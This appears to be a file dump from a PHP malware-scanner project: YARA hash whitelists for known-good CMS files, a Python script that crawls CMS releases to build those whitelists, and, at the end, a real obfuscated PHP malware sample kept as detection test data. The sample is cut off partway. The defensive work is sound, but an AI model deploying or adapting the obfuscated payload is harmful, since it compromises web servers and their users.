welcome. 151 | -------------------------------------------------------------------------------- /data/whitelist.yar: -------------------------------------------------------------------------------- 1 | /* 2 | Careful. Those rules are pretty heavy on computation 3 | since the sha1sum may be recomputed for every test. 4 | Please make sure that you're calling those rules after all the others. 
5 | */ 6 | 7 | include "whitelists/drupal.yar" 8 | include "whitelists/wordpress.yar" 9 | include "whitelists/symfony.yar" 10 | include "whitelists/phpmyadmin.yar" 11 | include "whitelists/magento1ce.yar" 12 | include "whitelists/magento2.yar" 13 | include "whitelists/prestashop.yar" 14 | include "whitelists/custom.yar" 15 | 16 | 17 | private rule Magento : ECommerce 18 | { 19 | condition: 20 | /* Magento 1.14.2.0 */ 21 | hash.sha1(0, filesize) == "039ad85dc5940947849f7fe1a179563c829403ab" or // lib/PEAR/XML/Parser/Simple.php 22 | hash.sha1(0, filesize) == "5f577c2a35ababbf39e0efb53294e5adf523822b" or // lib/PEAR/XML/Serializer.php 23 | hash.sha1(0, filesize) == "27f0e4b1a09e816e40f9e6396c2d4a3cabdb2797" or // lib/PEAR/XML/Parser.php 24 | hash.sha1(0, filesize) == "258522ff97a68138daf0566786b22e722c0ff520" or // lib/PEAR/XML/Unserializer.php 25 | hash.sha1(0, filesize) == "a90d7f679a41443d58d5a96bcb369c3196a19538" or // iib/PEAR/SOAP/Base.php 26 | hash.sha1(0, filesize) == "7faa31f0ee66f32a92b5fd516eb65ff4a3603156" or // lib/PEAR/SOAP/WSDL.php 27 | hash.sha1(0, filesize) == "6b3f32e50343b70138ce4adb73045782b3edd851" or // lib/phpseclib/Net/SSH1.php 28 | hash.sha1(0, filesize) == "ea4c5c75dc3e4ed53c6b9dba09ad9d23f10df9d5" or // lib/phpseclib/Crypt/Rijndael.php 29 | hash.sha1(0, filesize) == "eb9dd8ec849ef09b63a75b367441a14ca5d5f7ae" or // lib/phpseclib/Crypt/Hash.php 30 | hash.sha1(0, filesize) == "a52d111efd3b372104ebc139551d2d8516bbf5e0" or // lib/phpseclib/Crypt/RSA.php 31 | 32 | /* Magento 1.13.0.0 */ 33 | hash.sha1(0, filesize) == "988006fe987a3c192d74b355a5011326f7728d60" or // lib/PEAR/PEAR/PEAR.php 34 | hash.sha1(0, filesize) == "0747f27fd0469608d1686abeaf667d9ad2b4c214" or // lib/PEAR/Mail/mime.php 35 | hash.sha1(0, filesize) == "6c0b33527f8e4b0cab82fc9ba013549f945fad75" or // lib/PEAR/SOAP/Transport/HTTP.php 36 | hash.sha1(0, filesize) == "9a340997bddbee19c1ec9ed62aa3b7e7a39d620a" or // lib/PEAR/PEAR.php 37 | hash.sha1(0, filesize) == 
"a11e09ee903fe2a1f8188b27186d2dd5098419af" or // app/code/core/Mage/Adminhtml/Model/Url.php 38 | hash.sha1(0, filesize) == "c60a936b7a532a171b79e17bfc3497de1e3e25be" or // app/code/core/Mage/Dataflow/Model/Profile.php 39 | hash.sha1(0, filesize) == "9947a190e9d82a2e7a887b375f4b67a41349cc7f" or // app/code/core/Mage/Core/Model/Translate.php 40 | hash.sha1(0, filesize) == "5fe6024f5c565a7c789de28470b64ce95763e3f4" or // cron.php 41 | 42 | /* Magento 1.9.2.0 */ 43 | hash.sha1(0, filesize) == "4fa9deecb5a49b0d5b1f88a8730ce20a262386f7" or // lib/Zend/Session.php 44 | hash.sha1(0, filesize) == "f214646051f5376475d06ef50fe1e5634285ba1b" or // app/code/core/Mage/Adminhtml/Model/Url.php 45 | 46 | /* Magento 1.7.0.2 */ 47 | hash.sha1(0, filesize) == "f46cf6fd47e60e77089d94cca5b89d19458987ca" or // lib/Zend/Session.php 48 | hash.sha1(0, filesize) == "ffb3e46c87e173b1960e50f771954ebb1efda66e" or // lib/Zend/Ldap/Converter.php 49 | hash.sha1(0, filesize) == "7faa31f0ee66f32a92b5fd516eb65ff4a3603156" or // lib/PEAR/SOAP/WSDL.php 50 | hash.sha1(0, filesize) == "539de72a2a424d86483f461a9e38ee42df158f26" or // app/code/core/Mage/Adminhtml/Model/Url.php 51 | hash.sha1(0, filesize) == "6b3f32e50343b70138ce4adb73045782b3edd851" or // lib/phpseclib/Net/SSH1.php 52 | 53 | /* Magento 1.4.1.1 */ 54 | hash.sha1(0, filesize) == "0b74f4b259c63c01c74fb5913c3ada87296107c8" or // lib/Zend/Session.php 55 | hash.sha1(0, filesize) == "951a4639e49c6b2ad8adeb38481e2290297c8e70" or // lib/Zend/Ldap/Converter.php 56 | hash.sha1(0, filesize) == "44ba7a5b685f4a52113559f366aaf6e9a22ae21e" // app/code/core/Mage/Adminhtml/Model/Url.php 57 | } 58 | 59 | private rule Roundcube 60 | { 61 | condition: 62 | /* Roundcube 1.1.2 */ 63 | hash.sha1(0, filesize) == "afab52649172b46f64301f41371d346297046af2" or // program/lib/Roundcube/rcube_utils.php 64 | hash.sha1(0, filesize) == "e6b81834e081cc2bd38fce787c5088e63d933953" or // program/include/rcmail_output_html.php 65 | hash.sha1(0, filesize) == 
"7783e9fad144ca5292630d459bd86ec5ea5894fc" or // vendor/pear-pear.php.net/Net_LDAP2/Net/LDAP2/Util.php 66 | 67 | /* Roundcube 1.0.6 */ 68 | hash.sha1(0, filesize) == "76d55f05f2070f471ba977b5b0f690c91fa8cdab" or // program/lib/Roundcube/rcube_utils.php 69 | hash.sha1(0, filesize) == "c68319e3e1adcd3e22cf2338bc79f12fd54f6d4a" // program/include/rcmail_output_html.php 70 | } 71 | 72 | private rule Concrete5 73 | { 74 | condition: 75 | /* concrete5 7.4.2 */ 76 | hash.sha1(0, filesize) == "927bbd60554ae0789d4688738b4ae945195a3c1c" or // concrete/vendor/oyejorge/less.php/lib/Less/Tree/Dimension.php 77 | hash.sha1(0, filesize) == "67f07022dae5fa39e8a37c09d67cbcb833e10d1f" or // concrete/vendor/oyejorge/less.php/lib/Less/Tree/Unit.php 78 | hash.sha1(0, filesize) == "e1dcbc7b05e8ba6cba392f8fd44a3564fcad3666" // concrete/vendor/doctrine/inflector/lib/Doctrine/Common/Inflector/Inflector.php 79 | } 80 | 81 | private rule Dotclear : Blog 82 | { 83 | condition: 84 | /* dotclear 2.8.0 */ 85 | hash.sha1(0, filesize) == "c732d2d54a80250fb8b51d4dddb74d05a59cee2e" or // inc/public/class.dc.template.php 86 | hash.sha1(0, filesize) == "cc494f7f4044b5a3361281e27f2f7bb8952b8964" or // inc/core/class.dc.modules.php 87 | 88 | /* dotclear 2.7.5 */ 89 | hash.sha1(0, filesize) == "192126b08c40c5ca086b5e4d7433e982f708baf3" or // inc/public/class.dc.template.php 90 | hash.sha1(0, filesize) == "51e6810ccd3773e2bd453e97ccf16059551bae08" or // inc/libs/clearbricks/common/lib.date.php 91 | hash.sha1(0, filesize) == "4172e35e7c9ce35de9f56fb8dfebe8d453f0dee4" or // inc/libs/clearbricks/template/class.template.php 92 | hash.sha1(0, filesize) == "cf65db6ae55486f51370f87c4653aaed56903ccc" // inc/core/class.dc.modules.php 93 | } 94 | 95 | private rule Owncloud 96 | { 97 | condition: 98 | /* ownCloud 8.1.0 */ 99 | hash.sha1(0, filesize) == "a58489a3d8401295bb09cfbad09486f605625658" or // 3rdparty/phpseclib/phpseclib/phpseclib/Net/SSH1.php 100 | hash.sha1(0, filesize) == 
"463627a4064dc05e93e6f9fc5605d4c8a4e09200" or // 3rdparty/jeremeamia/SuperClosure/src/SerializableClosure.php 101 | hash.sha1(0, filesize) == "5346cb6817a75c26a6aad86e0b4ffb1d5145caa5" or // 3rdparty/symfony/process/Symfony/Component/Process/Process.php 102 | hash.sha1(0, filesize) == "c8a6d4292448c7996e0092e6bfd38f90c34df090" or // core/doc/admin/_images/oc_admin_app_page.png 103 | hash.sha1(0, filesize) == "acc7af31d4067c336937719b9a9ad7ac8497561e" // core/doc/admin/_sources/configuration_server/performance_tuning.txt 104 | } 105 | 106 | private rule Misc 107 | { 108 | condition: 109 | /* HTMLPurifier standalone 4.6.0 */ 110 | hash.sha1(0, filesize) == "9452a5f1183cbef0487b922cc1ba904ea21ad39a" 111 | } 112 | 113 | private rule IsWhitelisted 114 | { 115 | condition: 116 | Symfony or 117 | Wordpress or 118 | Prestashop or 119 | Magento or 120 | Magento1Ce or 121 | Magento2 or 122 | Drupal or 123 | Roundcube or 124 | Concrete5 or 125 | Dotclear or 126 | Owncloud or 127 | Phpmyadmin or 128 | Misc 129 | } 130 | -------------------------------------------------------------------------------- /data/whitelists/phpmyadmin.yar: -------------------------------------------------------------------------------- 1 | import "hash" 2 | 3 | private rule Phpmyadmin 4 | { 5 | meta: 6 | generated = "2018-05-30T12:35:38.661805" 7 | 8 | condition: 9 | /* Phpmyadmin 4.0.0 */ 10 | hash.sha1(0, filesize) == "1055b5023001d995d1a42e9e25731b621b3a1b78" or // libraries/plugins/auth/swekey/swekey.auth.lib.php 11 | hash.sha1(0, filesize) == "df4108af17881e331feeeeef9ec35ef4b2fff87c" or // libraries/select_lang.lib.php 12 | hash.sha1(0, filesize) == "534f0c81f69b78a3c0cd64748f55d86effa94d96" or // server_databases.php 13 | hash.sha1(0, filesize) == "1f1d01182cf376eb7cc463cb67334c98166f3033" or // libraries/build_html_for_db.lib.php 14 | hash.sha1(0, filesize) == "ca17eb55ded8f62e7339e20d699f1e43a52df778" or // pmd_relation_upd.php 15 | hash.sha1(0, filesize) == 
"82cff5aa0109bab26bd5e53f9928fa8cb1d21d18" or // locale/da/LC_MESSAGES/phpmyadmin.mo 16 | hash.sha1(0, filesize) == "0401e8fdf617610e6da72c8a75c7ff0bf0e2a1e7" or // pmd_relation_new.php 17 | hash.sha1(0, filesize) == "be3ea7a4f914387dc71531c2479867ee65dfe947" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 18 | hash.sha1(0, filesize) == "8b2f9bb37f25ed57bb7497d4dc9c98a042dd367e" or // gis_data_editor.php 19 | hash.sha1(0, filesize) == "0e76cbda3599c8139f6a8a5c6c17f6abc3835397" or // doc/doctrees/faq.doctree 20 | hash.sha1(0, filesize) == "a4e970da05605cfe12b0897c111e475bb1ceeea3" or // doc/doctrees/config.doctree 21 | hash.sha1(0, filesize) == "2905b3fe33a09435b76675a8728e461f3ac5f9e0" or // doc/html/_sources/faq.txt 22 | hash.sha1(0, filesize) == "68c477fe016abd4236ee25717c7c736d400f1b58" or // libraries/DisplayResults.class.php 23 | hash.sha1(0, filesize) == "2905b3fe33a09435b76675a8728e461f3ac5f9e0" or // doc/faq.rst 24 | 25 | /* Phpmyadmin 4.0.1 */ 26 | hash.sha1(0, filesize) == "8a47d5c1f34e15094d4a6264cda406b943e021c4" or // locale/sl/LC_MESSAGES/phpmyadmin.mo 27 | hash.sha1(0, filesize) == "75f8ad7de654ad3bbc274528996a954bcc1785bc" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 28 | hash.sha1(0, filesize) == "833ccf4a4016a1b9594db0469f22e08688ef345a" or // doc/doctrees/faq.doctree 29 | hash.sha1(0, filesize) == "40d47a7e9786f77e63ffeb444cd529e88e22498f" or // doc/doctrees/config.doctree 30 | hash.sha1(0, filesize) == "4e93c2797c64b3754694b69d3135e7a09f805a86" or // libraries/DisplayResults.class.php 31 | 32 | /* Phpmyadmin 4.0.2 */ 33 | hash.sha1(0, filesize) == "9354e4058a1efa8aa73918eb2bd45f5cd8777485" or // locale/ko/LC_MESSAGES/phpmyadmin.mo 34 | hash.sha1(0, filesize) == "7aa5c4d0e51d219ebba86ddc644dca0355e5f6cd" or // doc/doctrees/faq.doctree 35 | hash.sha1(0, filesize) == "73efef4f340f00aa2823cf575c30d5fd63d571cc" or // doc/doctrees/config.doctree 36 | hash.sha1(0, filesize) == "ee8b1d455efa66a92ce3025d7c79758cb2767e76" or // libraries/DisplayResults.class.php 
37 | 38 | /* Phpmyadmin 4.0.3 */ 39 | hash.sha1(0, filesize) == "72e309407d3a741f9345cc252d8853013909c1cb" or // doc/doctrees/faq.doctree 40 | hash.sha1(0, filesize) == "70ab1c6ebdcc383fa12e68b24dff205cc313761a" or // doc/doctrees/config.doctree 41 | 42 | /* Phpmyadmin 4.0.4 */ 43 | hash.sha1(0, filesize) == "ba8247bedab84b62d23998eb96be6f2a92d4d1bc" or // libraries/select_lang.lib.php 44 | hash.sha1(0, filesize) == "6feca5c241e41d8fdcfb0f9104f06fc27414206e" or // doc/doctrees/faq.doctree 45 | hash.sha1(0, filesize) == "5d01bc6404187356a5428ea392dda0304f5a06be" or // doc/doctrees/config.doctree 46 | hash.sha1(0, filesize) == "dfa5d49a57c3849589d7db123850fe22efe0e421" or // doc/html/_sources/faq.txt 47 | hash.sha1(0, filesize) == "dfa5d49a57c3849589d7db123850fe22efe0e421" or // doc/faq.rst 48 | 49 | /* Phpmyadmin 4.0.5 */ 50 | hash.sha1(0, filesize) == "8690e479b31ee1705de8fd654eed504ea86255d6" or // libraries/plugins/auth/swekey/swekey.auth.lib.php 51 | hash.sha1(0, filesize) == "0fa37a1808b87318af1c8b909515926ea908e20d" or // server_databases.php 52 | hash.sha1(0, filesize) == "08b9be901a1cad1910f909b0c3308c80179faea8" or // locale/pl/LC_MESSAGES/phpmyadmin.mo 53 | hash.sha1(0, filesize) == "1a39333456f3ed00f78c434cd2260aa1f6055d28" or // locale/zh_CN/LC_MESSAGES/phpmyadmin.mo 54 | hash.sha1(0, filesize) == "086cf75edbc7a84d7e2da7acd4ef449414b04a30" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 55 | hash.sha1(0, filesize) == "5d941f85a5364e609fc1e772df46b11cd53a31ce" or // locale/it/LC_MESSAGES/phpmyadmin.mo 56 | hash.sha1(0, filesize) == "38a06d88278ce2d049c27861f1065f946aee5fdb" or // locale/zh_TW/LC_MESSAGES/phpmyadmin.mo 57 | hash.sha1(0, filesize) == "d8209cbed693cbfab4e49a20d2b72a545eff09d7" or // doc/doctrees/config.doctree 58 | hash.sha1(0, filesize) == "fb04115aa12c7ba54adcc64b20255b3e93916e94" or // libraries/DisplayResults.class.php 59 | hash.sha1(0, filesize) == "e80ac17842b54c099836c04e4eebf72f09c36559" or // doc/doctrees/faq.doctree 60 | 61 | /* 
Phpmyadmin 4.0.6 */ 62 | hash.sha1(0, filesize) == "178edee119fd53a1ca87f289213faf34c6e23065" or // locale/it/LC_MESSAGES/phpmyadmin.mo 63 | hash.sha1(0, filesize) == "89137874313404331edd64dd561ee72c1e90a966" or // locale/pl/LC_MESSAGES/phpmyadmin.mo 64 | hash.sha1(0, filesize) == "21ace5bcde26b98a381091fc3dda588115bff565" or // locale/sv/LC_MESSAGES/phpmyadmin.mo 65 | hash.sha1(0, filesize) == "819cfe3120478406300d5fc446d258df9790db10" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 66 | hash.sha1(0, filesize) == "5c0ba64f2f6f4de362cb2a227325194283edd64b" or // doc/doctrees/faq.doctree 67 | hash.sha1(0, filesize) == "5993a60e0f14ef9d898b3f82e7bb5faf410084c9" or // doc/doctrees/config.doctree 68 | hash.sha1(0, filesize) == "5bf1ebc6cd395fc8cc084f2b2ce45ad31a2e847f" or // libraries/DisplayResults.class.php 69 | 70 | /* Phpmyadmin 4.0.7 */ 71 | hash.sha1(0, filesize) == "23590f9a72fd45409b79f238e6a32d394268d484" or // server_databases.php 72 | hash.sha1(0, filesize) == "f9b7639cb78d11bd6f55a89a4630409b1f0b4ed6" or // locale/zh_CN/LC_MESSAGES/phpmyadmin.mo 73 | hash.sha1(0, filesize) == "6790cd3b963f31c4706689564bb3a758868e25e2" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 74 | hash.sha1(0, filesize) == "0c7b68640f071c0a7cf2d5c27b1ab1a557778c35" or // doc/doctrees/faq.doctree 75 | hash.sha1(0, filesize) == "c9d24ecbe33a5a9bed089be06008d5ace9fe8022" or // doc/doctrees/config.doctree 76 | hash.sha1(0, filesize) == "28d2a89687bf1ab53d52180043635f0290d3e848" or // locale/en_GB/LC_MESSAGES/phpmyadmin.mo 77 | hash.sha1(0, filesize) == "2747f18959d06cadac8cd8d8a16b95ff8ef0fd25" or // locale/nb/LC_MESSAGES/phpmyadmin.mo 78 | hash.sha1(0, filesize) == "8eb466ea26d87c9a5b55c8349b106f5b621d8347" or // libraries/DisplayResults.class.php 79 | 80 | /* Phpmyadmin 4.0.8 */ 81 | hash.sha1(0, filesize) == "47b80bc9f6a053cbd794e349bf7c81e1ac523780" or // doc/doctrees/config.doctree 82 | hash.sha1(0, filesize) == "75f3774629d8bb599b4111a36a5b813e800b61bf" or // doc/doctrees/faq.doctree 83 | 84 | 
/* Phpmyadmin 4.0.9 */ 85 | hash.sha1(0, filesize) == "1db96b0f2bab1a326255a271c190859ca0d2fd15" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 86 | hash.sha1(0, filesize) == "5dc82742fbbe5b2322321995474a0a1a784736a1" or // doc/doctrees/faq.doctree 87 | hash.sha1(0, filesize) == "f8ed7a657101c83ca24761111dfcf8298818ea84" or // doc/doctrees/config.doctree 88 | 89 | /* Phpmyadmin 4.0.10 */ 90 | hash.sha1(0, filesize) == "3cb1858da44833ca8bca16c2651881d5d899a1dc" or // doc/doctrees/faq.doctree 91 | hash.sha1(0, filesize) == "cabf489740e6cf929cc6641dc68caac9b7a402a1" // doc/doctrees/config.doctree 92 | 93 | } 94 | -------------------------------------------------------------------------------- /utils/mass_whitelist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from __future__ import print_function 5 | 6 | import sys 7 | import tarfile 8 | from copy import copy 9 | from datetime import datetime 10 | from collections import OrderedDict 11 | from hashlib import sha1 12 | from urllib2 import urlopen, HTTPError 13 | from StringIO import StringIO 14 | 15 | import yara 16 | 17 | USAGE = """ 18 | USAGE: %(prog)s [ [ []]] 19 | 20 | Options: 21 | NAME : name of the CMS/whatever being whitelisted 22 | URL_PATTERN : download URL with __version__ as a version placeholder 23 | MAJOR : minimum and maximum major version to crawl (eg: 1-8, 8) 24 | MINOR : minimum and maximum minor version to crawl 25 | PATCH : minimum and maximum patch version to crawl 26 | 27 | Examples: 28 | %(prog)s drupal https://ftp.drupal.org/files/projects/drupal-__version__.tar.gz 9 50 29 | %(prog)s drupal https://ftp.drupal.org/files/projects/drupal-__version__.tar.gz 4-9 1-50 30 | 31 | %(prog)s wordpress https://wordpress.org/wordpress-__version__.tar.gz 4 15 32 | 33 | %(prog)s symphony https://github.com/symfony/symfony/archive/v__version__.tar.gz 3 9 34 | 35 | %(prog)s phpmyadmin 
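https://files.phpmyadmin.net/phpMyAdmin/__version__/phpMyAdmin-__version__-all-languages.tar.gz 4 9
""" % {'prog': sys.argv[0]}


class Opts:
    """Process-wide settings for the whitelist crawler.

    Upper-case attributes are the options. CMS_NAME, URL_PATTERN and the
    MIN_*/MAX_* version bounds are attached at start-up from sys.argv.
    """
    DEFAULT_MIN = 0
    DEFAULT_MAX = 99
    # Compiled once, from ../php.yar relative to the script's directory.
    YARA_RULES = yara.compile(sys.path[0]+'/../php.yar', includes=True, error_on_warning=True)

    @classmethod
    def to_str(cls):
        """Return the upper-case options as one 'NAME=value ...' string."""
        values = []
        for attr in cls.__dict__:
            if attr.isupper():
                values.append('%s=%s' % (attr, getattr(cls, attr)))
        # The format string must carry a placeholder: '' % x raises TypeError.
        return '<Opts(%s)>' % ' '.join(values)


def eprint(*args, **kwargs):
    """print() to stderr, so that stdout carries only the generated rule."""
    print(*args, file=sys.stderr, **kwargs)


def _comment_safe(text):
    """Replace control characters so text cannot terminate a one-line comment.

    Archive member names end up after `//` in the generated rule; a name
    holding a newline would otherwise spill into the rule's condition.
    """
    return ''.join('?' if (ord(ch) < 32 or ord(ch) == 127) else ch for ch in text)


def extract_version_arg(index):
    """Parse sys.argv[index] as 'MIN-MAX' or 'MAX' and return (min, max).

    Returns (Opts.DEFAULT_MIN, Opts.DEFAULT_MAX) when the argument is absent;
    a single number only replaces the maximum.
    """
    min_ver, max_ver = (Opts.DEFAULT_MIN, Opts.DEFAULT_MAX)
    if len(sys.argv) >= (index + 1):
        if '-' in sys.argv[index]:
            min_ver, max_ver = map(int, sys.argv[index].split('-'))
        else:
            max_ver = int(sys.argv[index])
    return min_ver, max_ver


def generate_whitelist(version):
    """Download one release and hash every member the detection rules flag.

    Returns {path_inside_archive: sha1_hexdigest} (possibly empty), or None
    when the download failed.

    NOTE(review): the archive is not authenticated (no checksum or signature
    check) and every flagged member is whitelisted by hash. Point URL_PATTERN
    at an https:// release location you trust, and review the generated rule
    before adding it to the whitelists.
    """
    rules = {}

    # download archive
    dl_failed = False
    download_url = Opts.URL_PATTERN.replace('__version__', version)
    download_url_str = Opts.URL_PATTERN.replace('__version__', '\x1b[1;33m%s\x1b[0m' % version)
    eprint("[+] Downloading %s... " % download_url_str, end='')
    # Progress goes to stderr, so that is the stream to flush.
    sys.stderr.flush()
    try:
        resp = urlopen(download_url)
        resp_code = resp.code
    except HTTPError as err:
        dl_failed = True
        resp_code = err.code
    if dl_failed or (resp_code != 200):
        eprint("\x1b[1;31mFAILED (%d)\x1b[0m" % resp_code)
        return None
    # NOTE(review): the whole archive is buffered in memory, with no size cap.
    data = StringIO(resp.read())
    data.seek(0)
    eprint("\x1b[1;32mOK\x1b[0m")

    # Scan members in memory: nothing is written to disk, so member paths
    # are only ever used as labels.
    eprint("[-] Generating whitelist... ", end='')
    sys.stderr.flush()
    tar = tarfile.open(mode='r:gz', fileobj=data)
    try:
        for entry in tar.getnames():
            entry_fd = tar.extractfile(entry)
            if entry_fd is None:
                # directories and other non-file members
                continue
            entry_data = entry_fd.read()
            matches = Opts.YARA_RULES.match(data=entry_data, fast=True)
            if matches:
                # drop the archive's top-level directory from the path
                rules['/'.join(entry.split('/')[1:])] = sha1(entry_data).hexdigest()
    finally:
        tar.close()
    eprint("\x1b[1;32mDONE\x1b[0m")

    return rules


# init vars
whitelists = OrderedDict()

# check args
if (len(sys.argv) < 3) or (len(sys.argv) > 6):
    eprint(USAGE)
    sys.exit(1)

# parse args
Opts.CMS_NAME = sys.argv[1]
Opts.URL_PATTERN = sys.argv[2]
Opts.MIN_MAJOR, Opts.MAX_MAJOR = extract_version_arg(3)
Opts.MIN_MINOR, Opts.MAX_MINOR = extract_version_arg(4)
Opts.MIN_PATCH, Opts.MAX_PATCH = extract_version_arg(5)

# loop over possible versions
for vmajor in range(Opts.MIN_MAJOR, Opts.MAX_MAJOR + 1):
    # download without vminor and vpatch (but ignore if it doesn't exist)
    version = "%d" % vmajor
    rules = generate_whitelist(version)
    if (rules is not None) and rules:
        whitelists[version] = rules

    has_mversion = False
    first_mloop = True
    for vminor in range(Opts.MIN_MINOR, Opts.MAX_MINOR + 1):
        # download without vpatch (but ignore if it doesn't exist)
        version = "%d.%d" % (vmajor, vminor)
        rules = generate_whitelist(version)
        if rules is not None:
            has_mversion = True
            if rules:
                whitelists[version] = rules
        #if (rules is None) and (has_mversion or not first_mloop):
        #    break
        first_mloop = False

        has_pversion = False
        first_ploop = True
        for vpatch in range(Opts.MIN_PATCH, Opts.MAX_PATCH + 1):
            version = "%d.%d.%d" % (vmajor, vminor, vpatch)
            rules = generate_whitelist(version)
            if rules is not None:
                has_pversion = True
                if rules:
                    whitelists[version] = rules
            # break loop if download failed and:
            #   - a version has already been found during this loop
            #   - this is the 2nd iteration (if a version wasn't found,
            #     it means download failed twice)
            if (rules is None) and (has_pversion or not first_ploop):
                break
            first_ploop = False

# remove duplicate entries: a (path, digest) pair is kept only for the first
# version it appears in
eprint("[+] Deduplicating detections... ", end='')
known_files = set()
for version, rules in list(whitelists.items()):
    used_rules = 0
    for filename, digest in list(rules.items()):
        rtuple = (filename, digest)
        if rtuple in known_files:
            del whitelists[version][filename]
        else:
            known_files.add(rtuple)
            used_rules += 1
    if used_rules == 0:
        del whitelists[version]
eprint("\x1b[1;32mDONE\x1b[0m")

eprint("[+] Generating final whitelist... ", end='')
# build final rule
prefix = 8 * ' '
conditions = []
len_wl = len(whitelists) - 1
for index, (version, rules) in enumerate(whitelists.items()):
    cond_str = '%s/* %s %s */\n' % (prefix, Opts.CMS_NAME.title(), version)
    len_rules = len(rules) - 1
    for inner_index, (filename, digest) in enumerate(rules.items()):
        # every clause but the very last one is chained with "or"
        is_last = (index == len_wl) and (inner_index == len_rules)
        joiner = '' if is_last else ' or'
        cond_str += '%shash.sha1(0, filesize) == "%s"%s // %s\n' % (
            prefix, digest, joiner, _comment_safe(filename))
    conditions.append(cond_str)
eprint("\x1b[1;32mDONE\x1b[0m")

final_rule = """
import "hash"

private rule %(name)s
{
    meta:
        generated = "%(gendate)s"

    condition:
%(conditions)s
}
""" % {
    'name': Opts.CMS_NAME.title(),
    'gendate': datetime.now().isoformat(),
    'conditions': '\n'.join(conditions)
}
print(final_rule)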
209 | -------------------------------------------------------------------------------- /data/samples/real/awvjtnz.php: -------------------------------------------------------------------------------- 1 | # This is a sample of PHP malware discovered 2017/11/15. 2 | # Unpacks at least 5 levels deep, including references to variables from previous levels of expansion. 3 | # Also seen with other variable names and constants altered. 4 | :h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1%s: x5c%j:.2^,%b:%s: x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))/*)323zbe!-#jt0*?]+^?]_ x5c}X x24hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#! x240w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*272qj%6<^#zsfvr# x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3 162 x65 141 x74 145 x5f 146 x772 145 x66 157 x78"))) { $oqtpxpv = " x6|:*r%:-t%)3of:opjudovg<~ x24! x242178}527}88:}334}472 xw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]! x24Ypp3)%cB%iN}#-! 
x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2*msv%)}k~~~%fdy!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH# x27rfs%6~6< x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)% x24- x24*#L4]275L3]x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x2id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6.%!<***f x27,*e x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6U<#16,47R57,27Rpd%6!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277##]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x24- x24 x5c%j^ x24- x24tvctus)% x24- x24buas," x72 166 x3a 61 x31")) or (strstr($uas!gj}1~!<2p% x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER[" x48 124 x5ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~7;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x24- x24gvodujpo! x24- xSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5! 
